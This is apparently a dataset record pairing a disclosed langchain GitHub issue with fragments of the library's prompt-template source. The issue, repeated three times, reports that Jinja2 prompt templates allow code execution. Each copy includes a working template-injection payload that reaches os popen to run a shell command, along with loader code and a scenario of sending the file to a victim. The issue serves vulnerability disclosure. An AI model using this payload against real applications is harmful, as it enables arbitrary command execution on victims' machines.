- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. The `dir` command will be executed.
Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.
Analysis: Jinja2 is used to render prompts, so template injection can happen.
Note: in pt.json, the `template` field carries the payload; the index of `__subclasses__` may differ in other environments.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/base.py | try:
from jinja2 import Environment, meta
except ImportError:
raise ImportError(
"jinja2 not installed, which is needed to use the jinja2_formatter. "
"Please install it with `pip install jinja2`."
)
env = Environment()
ast = env.parse(template)
variables = meta.find_undeclared_variables(ast)
return variables
DEFAULT_FORMATTER_MAPPING: Dict[str, Callable] = {
"f-string": formatter.format,
"jinja2": jinja2_formatter,
}
DEFAULT_VALIDATOR_MAPPING: Dict[str, Callable] = {
"f-string": formatter.validate_input_variables,
"jinja2": validate_jinja2,
}
def check_valid_template( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. The `dir` command will be executed.
Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.
Analysis: Jinja2 is used to render prompts, so template injection can happen.
Note: in pt.json, the `template` field carries the payload; the index of `__subclasses__` may differ in other environments.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/base.py | template: str, template_format: str, input_variables: List[str]
) -> None:
"""Check that template string is valid."""
if template_format not in DEFAULT_FORMATTER_MAPPING:
valid_formats = list(DEFAULT_FORMATTER_MAPPING)
raise ValueError(
f"Invalid template format. Got `{template_format}`;"
f" should be one of {valid_formats}"
)
try:
validator_func = DEFAULT_VALIDATOR_MAPPING[template_format]
validator_func(template, input_variables)
except KeyError as e:
raise ValueError(
"Invalid prompt schema; check for mismatched or missing input parameters. "
+ str(e)
)
class StringPromptValue(PromptValue): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. The `dir` command will be executed.
Attack scenario: Alice can send a prompt file to Bob and get Bob to load it.
Analysis: Jinja2 is used to render prompts, so template injection can happen.
Note: in pt.json, the `template` field carries the payload; the index of `__subclasses__` may differ in other environments.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/base.py | """String prompt value."""
text: str
"""Prompt text."""
def to_string(self) -> str:
"""Return prompt as string."""
return self.text
def to_messages(self) -> List[BaseMessage]:
"""Return prompt as messages."""
return [HumanMessage(content=self.text)]
class StringPromptTemplate(BasePromptTemplate, ABC):
"""String prompt that exposes the format method, returning a prompt."""
def format_prompt(self, **kwargs: Any) -> PromptValue:
"""Create Chat Messages."""
return StringPromptValue(text=self.format(**kwargs)) |
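To round out the chunk above, a brief sketch of the `PromptValue` round trip using the stock `PromptTemplate` (itself a `StringPromptTemplate`):

```python
from langchain.prompts import PromptTemplate

prompt = PromptTemplate.from_template("Tell me a {adjective} joke.")
value = prompt.format_prompt(adjective="short")  # -> StringPromptValue
print(value.to_string())    # plain string for completion-style models
print(value.to_messages())  # [HumanMessage(...)] for chat models
```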